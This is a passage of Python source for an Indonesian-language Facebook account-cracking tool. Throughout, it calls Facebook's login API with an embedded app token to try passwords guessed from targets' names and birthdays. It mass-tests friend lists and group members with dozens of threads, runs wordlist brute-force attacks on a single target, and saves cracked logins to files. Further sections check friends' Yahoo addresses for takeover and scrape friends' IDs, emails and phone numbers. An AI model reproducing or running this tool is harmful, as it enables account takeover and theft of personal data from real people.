'\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz4 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: pz5 = ('sayang') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') y = json.load(data) if 'access_token' in y: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: if 'www.facebook.com' in y['error_msg']: print '\x1b[1;91m[+] \x1b[1;92mFounded.' print '\x1b[1;91m[!] 
\x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name'] print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5 raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() else: print '\x1b[1;91m[!] Sorry, opening password target failed :(' print '\x1b[1;91m[!] Try other method.' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() except KeyError: print '\x1b[1;91m[!] Terget not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() def crack(): global file global idlist global passw os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.01) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m') try: file = open(idlist, 'r') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') for x in range(40): zedd = threading.Thread(target=scrak, args=()) zedd.start() threads.append(zedd) for zedd in threads: zedd.join() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_hack() def scrak(): global back global berhasil global cekpoint global gagal global up try: buka = open(idlist, 'r') up = buka.read().split() while file: username = file.readline().strip() url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6' data = urllib.urlopen(url) mpsh = json.load(data) if back == len(up): break if 'access_token' in mpsh: bisa = open('Berhasil.txt', 'w') bisa.write(username + ' | ' + passw + '\n') bisa.close() berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: if 'www.facebook.com' in mpsh['error_msg']: cek = open('Cekpoint.txt', 'w') cek.write(username + ' | ' + passw + '\n') cek.close() cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw) back += 1 else: gagal.append(username) back += 1 sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint))) sys.stdout.flush() except IOError: print '\n\x1b[1;91m[!] Connection busy' time.sleep(0.01) except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' def hasil(): print print 52 * '\x1b[1;97m\xe2\x95\x90' for b in berhasil: print b for c in cekpoint: print c print print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal)) keluar() def super(): global toket os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Crack from Friends' print '║-> \x1b[1;37;40m2. Crack from Group' print '║-> \x1b[1;37;40m3. 
Crack from File' print '║-> \x1b[1;31;40m0. Kembali' print '\x1b[1;37;40m║' pilih_super() def pilih_super(): peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if peak == '': print '\x1b[1;91m[!] Can\'t empty' pilih_super() else: if peak == '1': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) for s in z['data']: id.append(s['id']) else: if peak == '2': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket) s = json.loads(re.text) for i in s['data']: id.append(i['id']) else: if peak == '3': os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' try: idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m') for line in open(idlist,'r').readlines(): id.append(line.strip()) except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') super() else: if peak == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada' pilih_super() print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id)) jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') titik = ['. ', '.. ', '... 
'] for o in titik: print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o, sys.stdout.flush() time.sleep(0.01) print print 52 * '\x1b[1;97m\xe2\x95\x90' def main(arg): user = arg try: a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket) b = json.loads(a.text) pass1 = b['first_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name'] else: pass2 = b['firs_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name'] else: pass3 = b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name'] else: pass4 = b['last_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name'] else: birthday = b['birthday'] pass5 = birthday.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name'] else: pass6 = ('sayang') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' 
+ pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name'] else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name'] except: pass p = ThreadPool(30) p.map(main, id) print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() def brute(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(0.5) login() else: os.system('clear') print logo print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90' try: email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m') total = open(passw, 'r') total = total.readlines() print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') sandi = open(passw, 'r') for pw in sandi: try: pw = pw.replace('\n', '') sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw) sys.stdout.flush() data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') mpsh = json.loads(data.text) if 'access_token' in mpsh: dapat = open('Brute.txt', 'w') dapat.write(email + ' | ' + pw + '\n') dapat.close() print '\n\x1b[1;91m[+] \x1b[1;92mFounded.' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() else: if 'www.facebook.com' in mpsh['error_msg']: ceks = open('Brutecekpoint.txt', 'w') ceks.write(email + ' | ' + pw + '\n') ceks.close() print '\n\x1b[1;91m[+] \x1b[1;92mFounded.' print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Connection Error' time.sleep(1) except IOError: print '\x1b[1;91m[!] File not found...' print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist' tanyaw() def tanyaw(): why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ') if why == '': print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)' tanyaw() else: if why == 'y': wordlist() else: if why == 'Y': wordlist() else: if why == 't': menu_hack() else: if why == 'T': menu_hack() else: print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)' tanyaw() def menu_yahoo(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] 
Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. From Friends' print '║-> \x1b[1;37;40m2. From File' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' yahoo_pilih() def yahoo_pilih(): go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if go == '': print '\x1b[1;91m[!] Can\'t empty' yahoo_pilih() else: if go == '1': yahoofriends() else: if go == '2': yahoolist() else: if go == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan' yahoo_pilih() def yahoofriends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token Tidak Ada' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) kimak = json.loads(friends.text) save = open('MailVuln.txt', 'w') print 52 * '\x1b[1;97m\xe2\x95\x90' for w in kimak['data']: jml += 1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]' print 52 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' except KeyError: pass print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def yahoolist(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m') try: total = open(files, 'r') mail = total.readlines() except IOError: print '\x1b[1;91m[!] File not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') save = open('MailVuln.txt', 'w') print 52 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] 
\x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]' print mail = open(files, 'r').readlines() for pw in mail: mail = pw.replace('\n', '') jml += 1 mpsh.append(jml) yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m ' + mail continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print '\x1b[1;92m ' + mail else: print '\x1b[1;91m ' + mail print '\n\x1b[1;91m[+] \x1b[1;97mFinish' print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') menu_yahoo() def grab(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' print '║-> \x1b[1;37;40m1. Get ID From Friends' print '║-> \x1b[1;37;40m2. Get Friends ID From Friends' print '║-> \x1b[1;37;40m3. Get ID From GRUP' print '║-> \x1b[1;37;40m4. Get Friends Email' print '║-> \x1b[1;37;40m5. Get Friends Email From Friends' print '║-> \x1b[1;37;40m6. Get Phone From Friends' print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends' print '║-> \x1b[1;31;40m0. Back' print '\x1b[1;37;40m║' grab_pilih() def grab_pilih(): cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ') if cuih == '': print '\x1b[1;91m[!] Can\'t empty' grab_pilih() else: if cuih == '1': id_friends() else: if cuih == '2': idfrom_friends() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_friends() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_friends() else: if cuih == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found' grab_pilih() def id_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends) print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] 
An error occurred' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def idfrom_friends(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Not be friends' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromfriends.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends) print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def id_member_grup(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] 
Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 52 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Error when creating file' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Stopped' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Group not found' raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] No connection' keluar() def email(): os.system('clear') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token not found' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('clear') print logo print 52 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...') print 52 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 52 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ 